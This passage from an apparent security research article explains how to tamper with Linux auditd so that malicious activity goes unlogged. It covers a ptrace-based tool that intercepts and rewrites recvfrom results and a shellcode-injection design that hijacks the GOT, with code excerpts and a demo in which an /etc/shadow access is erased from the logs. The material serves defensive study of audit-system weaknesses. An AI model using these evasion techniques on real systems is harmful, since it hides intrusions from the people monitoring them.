</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;AUID&#34;</span>: <span style="color:#e6db74">&#34;unset&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;UID&#34;</span>: <span style="color:#e6db74">&#34;user&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;GID&#34;</span>: <span style="color:#e6db74">&#34;user&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;EUID&#34;</span>: <span style="color:#e6db74">&#34;user&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;SUID&#34;</span>: <span style="color:#e6db74">&#34;user&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;FSUID&#34;</span>: <span style="color:#e6db74">&#34;user&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;EGID&#34;</span>: <span style="color:#e6db74">&#34;user&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;SGID&#34;</span>: <span style="color:#e6db74">&#34;user&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;FSGID&#34;</span>: <span style="color:#e6db74">&#34;user&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ARGV&#34;</span>: [
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;0xffffff9c&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;0x7fffd0dd98f0&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;0x80000&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;0x0&#34;</span>
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;PPID&#34;</span>: {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;EVENT_ID&#34;</span>: <span style="color:#e6db74">&#34;1690783437.445:909&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;comm&#34;</span>: <span style="color:#e6db74">&#34;bash&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;exe&#34;</span>: <span style="color:#e6db74">&#34;/usr/bin/bash&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;ppid&#34;</span>: <span style="color:#ae81ff">1149</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  },
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;PATH&#34;</span>: [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;item&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;/etc/shadow&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;inode&#34;</span>: <span style="color:#ae81ff">270575</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;dev&#34;</span>: <span style="color:#e6db74">&#34;ca:03&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;mode&#34;</span>: <span style="color:#e6db74">&#34;0o100000&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;ouid&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;ogid&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;rdev&#34;</span>: <span style="color:#e6db74">&#34;00:00&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;nametype&#34;</span>: <span style="color:#e6db74">&#34;NORMAL&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;cap_fp&#34;</span>: <span style="color:#e6db74">&#34;0x0&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;cap_fi&#34;</span>: <span style="color:#e6db74">&#34;0x0&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;cap_fe&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;cap_fver&#34;</span>: <span style="color:#e6db74">&#34;0x0&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;cap_frootid&#34;</span>: <span style="color:#e6db74">&#34;0&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;OUID&#34;</span>: <span style="color:#e6db74">&#34;root&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;OGID&#34;</span>: <span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  ],
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;PROCTITLE&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ARGV&#34;</span>: [
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;bat&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;-p&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;/etc/shadow&#34;</span>
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>As with every detection and monitoring solution, there is no <em>correct usage</em> of <em>auditd</em>.
The above configuration provides a good starting point to get some telemetry. Fine tuning,
custom configuration and monitoring collected logs for malicious
activity needs to be done manually.</p>
<h3 id="attack-surface-of-the-audit-system">Attack Surface of the Audit System</h3>
<p>One of the main advantages of the <em>Linux audit system</em> is that its telemetry is generated
at kernel level. The <em>auditd</em> daemon utilizes <a href="https://man7.org/linux/man-pages/man7/netlink.7.html">netlink</a>
to obtain events directly from the <em>audit kernel module</em>. The event generation (<em>audit kernel module</em>) as well as
the event processing (<em>auditd daemon</em>) are therefore always privilege separated from low
privileged user processes. Tampering with events from a regular user context is therefore not
that promising.</p>
<p>From a high privileged context however, it is possible to tamper with the userspace component
of the <em>audit system</em>, which is the <em>auditd</em> daemon. The goal of this
tampering is to suppress events that indicate malicious behavior. Simply stopping the daemon or
modifying its rule set is not desirable, as this creates additional events that should be monitored
for in each reasonable <em>auditd</em> configuration.</p>
<p>During our research, we experimented with two different approaches and created a <em>PoC</em> for both
of them. In the following, a brief summary for both <em>PoCs</em> is provided, followed by a deeper
technical analysis in the further sections:</p>
<p><strong>daphne</strong></p>
<ul>
<li>Uses <a href="https://man7.org/linux/man-pages/man2/ptrace.2.html">ptrace</a> to attach to the <em>auditd</em> process</li>
<li>Intercepts the <code>recvfrom</code> system call and inspects the returned buffer</li>
<li>Clears or replaces certain keywords on their appearance within the buffer</li>
<li>Returns the tampered syscall result to <em>auditd</em></li>
</ul>
<p><strong>apollon</strong></p>
<ul>
<li>Uses <code>/proc/PID/mem</code> and <code>/proc/PID/maps</code> to tamper with the integrity of the <em>auditd</em> process</li>
<li>Searches for an unused executable memory region within the <em>auditd</em> process to house shellcode (<em>code cave</em>)</li>
<li>Injects event filtering shellcode into the <em>code cave</em> within the <em>auditd</em> process</li>
<li>Replaces the <code>recvfrom</code> entry in the <em>global offset table</em> of <em>auditd</em> with a pointer to the shellcode</li>
</ul>
<h3 id="daphne---technical-details">daphne - Technical Details</h3>
<p><em>ptrace</em> is a well known system call that allows one process to monitor and control the execution of another
process. This involves reading and writing process memory, inspecting and changing <em>CPU</em> registers and
intercepting system calls. With these powerful capabilities, <em>ptrace</em> is a suitable tool to tamper with <em>auditd</em>
events. As already mentioned, <em>auditd</em> uses the <code>recvfrom</code> system call to obtain events from the kernel via
<em>netlink</em>. <em>daphne</em> uses <em>ptrace</em> to attach to <em>auditd</em> and intercept this system call:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#a6e22e">ptrace</span>(PTRACE_ATTACH, <span style="color:#a6e22e">atoi</span>(argv[<span style="color:#ae81ff">1</span>]), <span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;[+] Attached to process: %d</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, PID);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">ptrace</span>(PTRACE_SETOPTIONS, PID, <span style="color:#ae81ff">0</span>, (<span style="color:#66d9ef">void</span><span style="color:#f92672">*</span>)PTRACE_O_TRACECLONE);
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">ptrace</span>(PTRACE_SETOPTIONS, PID, <span style="color:#ae81ff">0</span>, (<span style="color:#66d9ef">void</span><span style="color:#f92672">*</span>)PTRACE_O_TRACESYSGOOD);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;[+] Configured ptrace correctly.</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;[+] Starting ptrace event loop.</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">bool</span> keep_filtering <span style="color:#f92672">=</span> false;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">struct</span> user_regs_struct regs;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> (;;)
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span><span style="color:#a6e22e">ptrace_wait_syscall</span>(PID))
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;[+] The monitored process exited.</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// At this stage, the syscall did not execute yet.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span><span style="color:#a6e22e">ptrace_wait_syscall</span>(PID))
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;[+] The monitored process exited.</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// At this stage, the syscall was executed.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#75715e">// The results are contained within the corresponding registers:
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#75715e">//  rdi:      File descriptor that was read from
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#75715e">//  rsi:      Buffer the data was stored in
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#75715e">//  rdx:      Size of the buffer pointed to by rsi
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#75715e">//  r10:      Flags
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#75715e">//  r8:       struct sockaddr
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#75715e">//  r9:       addr_len
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#75715e">//  rax:      number of bytes that were read
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">ptrace</span>(PTRACE_GETREGS, PID, <span style="color:#ae81ff">0</span>, <span style="color:#f92672">&amp;</span>regs);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (regs.orig_rax <span style="color:#f92672">==</span> SYS_recvfrom <span style="color:#f92672">&amp;&amp;</span> (<span style="color:#66d9ef">int</span>)regs.rax <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0</span>)
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#75715e">// do tampering in buffer pointed to by regs.rsi
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>To tamper with <em>auditd</em> events, it is required to understand the format
in which these events are emitted by the kernel. The following listing
shows some examples for raw event messages that are obtained by <em>auditd</em>
from the <em>netlink</em>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>201001450000000000617564697428313639303238383431352e3132303a3836383235293a20617263683d63303030303033652073797363616c6c3d353920737563636573733d79657320657869743d302061303d3539336535393465633533302061313d3539336535393465633631302061323d3539336535393465353366302061333d38206974656d733d3220707069643d31303435207069643d3132333920617569643d34323934393637323935207569643d30206769643d3020657569643d3020737569643d302066737569643d3020656769643d3020736769643d302066736769643d30207474793d70747331207365733d3432393439363732393520636f6d6d3d22696422206578653d222f7573722f62696e2f696422206b65793d227265636f6e22
</span></span><span style="display:flex;"><span>2b0001d50000000000617564697428313639303238383431352e3132303a3836383235293a20617267633d312061303d22696422
</span></span><span style="display:flex;"><span>b70001650000000000617564697428313639303238383431352e3132303a3836383235293a206974656d3d30206e616d653d222f7573722f62696e2f69642220696e6f64653d313338323534206465763d63613a3033206d6f64653d30313030373535206f7569643d30206f6769643d3020726465763d30303a3030206e616d65747970653d4e4f524d414c206361705f66703d30206361705f66693d30206361705f66653d30206361705f667665723d30206361705f66726f6f7469643d30
</span></span><span style="display:flex;"><span>c70001650000000000617564697428313639303238383431352e3132303a3836383235293a206974656d3d31206e616d653d222f6c696236342f6c642d6c696e75782d7838362d36342e736f2e322220696e6f64653d313335363030206465763d63613a3033206d6f64653d30313030373535206f7569643d30206f6769643d3020726465763d30303a3030206e616d65747970653d4e4f524d414c206361705f66703d30206361705f66693d30206361705f66653d30206361705f667665723d30206361705f66726f6f7469643d30
</span></span><span style="display:flex;"><span>2b0002f50000000000617564697428313639303238383431352e3132303a3836383235293a2070726f637469746c653d22696422
</span></span><span style="display:flex;"><span>1d0002850000000000617564697428313639303238383431352e3132303a3836383235293a20
</span></span></code></pre></div><p>To understand this format, we take a look at the <em>auditd</em> source code,
which is publicly available at <a href="https://github.com/linux-audit/audit-userspace">GitHub</a>.
The corresponding structures can be found within the <a href="https://github.com/linux-audit/audit-userspace/blob/master/lib/libaudit.h#L525">libaudit.h</a>
header file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">// defined in libaudit.h
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">struct</span> audit_message
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">struct</span>      nlmsghdr nlh;
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">char</span>        data[MAX_AUDIT_MESSAGE_LENGTH];
</span></span><span style="display:flex;"><span>};
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// defined in netlink.h
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">struct</span> nlmsghdr
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>	__u32		nlmsg_len;
</span></span><span style="display:flex;"><span>	__u16		nlmsg_type;
</span></span><span style="display:flex;"><span>	__u16		nlmsg_flags;
</span></span><span style="display:flex;"><span>	__u32		nlmsg_seq;
</span></span><span style="display:flex;"><span>	__u32		nlmsg_pid;
</span></span><span style="display:flex;"><span>};
</span></span></code></pre></div><p>With regard to the output shown above, the relevant takeaways from these structures are:</p>
<ol>
<li>The first four bytes represent the length of the message</li>
<li>The next two bytes represent the message type</li>
<li>The actual audit message begins 16 bytes from the start of the buffer</li>
</ol>
<p>A list of possible message types can be found within the <a href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/audit.h">audit.h</a>
header file. Two prominent examples include <code>AUDIT_EXECVE</code> with a numerical
value of <code>1309</code> (<code>0x51d</code>), that is used for logging <code>execve</code> syscall events
and <code>AUDIT_EOE</code> with a numerical value of <code>1320</code> (<code>0x528</code>), which is used to
end a multi record event.</p>
<p>Tampering with <em>auditd</em> messages is now simple:</p>
<ul>
<li>Skip the first 16 bytes of the result buffer</li>
<li>Check for suspicious strings within the payload buffer</li>
<li>Replace suspicious strings or remove the whole message</li>
<li>Continue execution</li>
</ul>
<p>That being said, there are some pitfalls. As already demonstrated, there are usually multiple
messages belonging to the same event. Each <code>recvfrom</code> call only obtains one of these messages.
Just matching for suspicious strings to hide may replace single messages of the event,
while others still pass. This creates odd-looking events that are detected easily.</p>
<p><em>daphne</em> solves this issue by looking also at the event IDs after the first event message has
been filtered. For all following events, their event ID is compared against the filtered event
ID. If they match, these events are filtered as well. However, if the filtering rule does not
apply to the first message within an event group, these events are still forwarded until the
matching event message is reached. Therefore, the filter pattern should preferably be one of the
first messages within an <em>auditd</em> event group.</p>
<h4 id="demo">Demo</h4>
<p>The following listing shows an example invocation of <em>daphne</em>. <code>427</code> is the process ID of <em>auditd</em>,
whereas <code>1476</code> is the process ID of a bash shell we want to exclude from monitoring:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>[user@host daphne]$ sudo ./dist/daphne-x64 <span style="color:#ae81ff">427</span> <span style="color:#ae81ff">1476</span>
</span></span><span style="display:flex;"><span>[+] Attached to process: 427
</span></span><span style="display:flex;"><span>[+] Configured ptrace correctly.
</span></span><span style="display:flex;"><span>[+] Starting ptrace event loop.
</span></span><span style="display:flex;"><span>[+] Intercepted SYS_RECVFROM call.
</span></span><span style="display:flex;"><span>[+] Intercepted SYS_RECVFROM call.
</span></span><span style="display:flex;"><span>[+] Intercepted SYS_RECVFROM call.
</span></span><span style="display:flex;"><span>[+] Intercepted SYS_RECVFROM call.
</span></span><span style="display:flex;"><span>[+] Intercepted SYS_RECVFROM call.
</span></span><span style="display:flex;"><span>[+] Intercepted SYS_RECVFROM call.
</span></span><span style="display:flex;"><span>[+] Intercepted SYS_RECVFROM call.
</span></span></code></pre></div><p>After starting <em>daphne</em>, we attempt to access the file <code>/etc/shadow</code>. First, from a regular
bash shell, then from our hidden shell and then again from the regular one. The following
events can be observed within the <em>auditd</em> log:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-java" data-lang="java"><span style="display:flex;"><span>type<span style="color:#f92672">=</span>SYSCALL msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690784006.115</span><span style="color:#f92672">:</span><span style="color:#ae81ff">1296</span><span style="color:#f92672">):</span> arch<span style="color:#f92672">=</span>c000003e syscall<span style="color:#f92672">=</span><span style="color:#ae81ff">257</span> success<span style="color:#f92672">=</span>no exit<span style="color:#f92672">=-</span><span style="color:#ae81ff">13</span> a0<span style="color:#f92672">=</span>ffffff9c a1<span style="color:#f92672">=</span><span style="color:#ae81ff">7f</span>fdf2d506b0 a2<span style="color:#f92672">=</span><span style="color:#ae81ff">80000</span> a3<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> items<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> ppid<span style="color:#f92672">=</span><span style="color:#ae81ff">1438</span> pid<span style="color:#f92672">=</span><span style="color:#ae81ff">1537</span> auid<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> uid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> gid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> euid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> suid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> fsuid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> egid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> sgid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> fsgid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> tty<span style="color:#f92672">=</span>pts2 ses<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> comm<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;bat&#34;</span> exe<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/usr/bin/bat&#34;</span> key<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;etcpasswd&#34;</span>ARCH<span style="color:#f92672">=</span>x86_64 SYSCALL<span style="color:#f92672">=</span>openat AUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;unset&#34;</span> UID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> GID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> EUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> SUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> FSUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> EGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> SGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> FSGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PATH msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690784006.115</span><span style="color:#f92672">:</span><span style="color:#ae81ff">1296</span><span style="color:#f92672">):</span> item<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/etc/shadow&#34;</span> inode<span style="color:#f92672">=</span><span style="color:#ae81ff">270575</span> dev<span style="color:#f92672">=</span>ca<span style="color:#f92672">:</span><span style="color:#ae81ff">03</span> mode<span style="color:#f92672">=</span><span style="color:#ae81ff">0100000</span> ouid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> ogid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> rdev<span style="color:#f92672">=</span><span style="color:#ae81ff">00</span><span style="color:#f92672">:</span><span style="color:#ae81ff">00</span> nametype<span style="color:#f92672">=</span>NORMAL cap_fp<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fi<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fe<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fver<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_frootid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>OUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> OGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PROCTITLE msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690784006.115</span><span style="color:#f92672">:</span><span style="color:#ae81ff">1296</span><span style="color:#f92672">):</span> proctitle<span style="color:#f92672">=</span><span style="color:#ae81ff">626174002</span>D70002F6574632F736861646F77
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>SYSCALL msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690784012.792</span><span style="color:#f92672">:</span><span style="color:#ae81ff">1298</span><span style="color:#f92672">):</span> arch<span style="color:#f92672">=</span>c000003e syscall<span style="color:#f92672">=</span><span style="color:#ae81ff">257</span> success<span style="color:#f92672">=</span>no exit<span style="color:#f92672">=-</span><span style="color:#ae81ff">13</span> a0<span style="color:#f92672">=</span>ffffff9c a1<span style="color:#f92672">=</span><span style="color:#ae81ff">7f</span>fc34413f90 a2<span style="color:#f92672">=</span><span style="color:#ae81ff">80000</span> a3<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> items<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> ppid<span style="color:#f92672">=</span><span style="color:#ae81ff">1438</span> pid<span style="color:#f92672">=</span><span style="color:#ae81ff">1545</span> auid<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> uid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> gid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> euid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> suid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> fsuid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> egid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> sgid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> fsgid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> tty<span style="color:#f92672">=</span>pts2 ses<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> comm<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;bat&#34;</span> exe<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/usr/bin/bat&#34;</span> key<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;etcpasswd&#34;</span>ARCH<span style="color:#f92672">=</span>x86_64 SYSCALL<span style="color:#f92672">=</span>openat AUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;unset&#34;</span> UID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> GID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> EUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> SUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> FSUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> EGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> SGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> FSGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PATH msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690784012.792</span><span style="color:#f92672">:</span><span style="color:#ae81ff">1298</span><span style="color:#f92672">):</span> item<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/etc/shadow&#34;</span> inode<span style="color:#f92672">=</span><span style="color:#ae81ff">270575</span> dev<span style="color:#f92672">=</span>ca<span style="color:#f92672">:</span><span style="color:#ae81ff">03</span> mode<span style="color:#f92672">=</span><span style="color:#ae81ff">0100000</span> ouid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> ogid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> rdev<span style="color:#f92672">=</span><span style="color:#ae81ff">00</span><span style="color:#f92672">:</span><span style="color:#ae81ff">00</span> nametype<span style="color:#f92672">=</span>NORMAL cap_fp<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fi<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fe<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fver<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_frootid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>OUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> OGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PROCTITLE msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690784012.792</span><span style="color:#f92672">:</span><span style="color:#ae81ff">1298</span><span style="color:#f92672">):</span> proctitle<span style="color:#f92672">=</span><span style="color:#ae81ff">626174002</span>D70002F6574632F736861646F77
</span></span></code></pre></div><p>As can be seen, only two events are logged (event ID <code>1296</code> and <code>1298</code>). One event with event
ID <code>1297</code> seems to be missing. This is exactly the event that was cleared by <em>daphne</em>. Instead
of dropping events, <em>daphne</em> can also tamper the event messages by performing replace operations.
In the following example, the string <code>/etc/shadow</code> is replaced with <code>/etc/no_shadow</code> within every
audit event:</p>
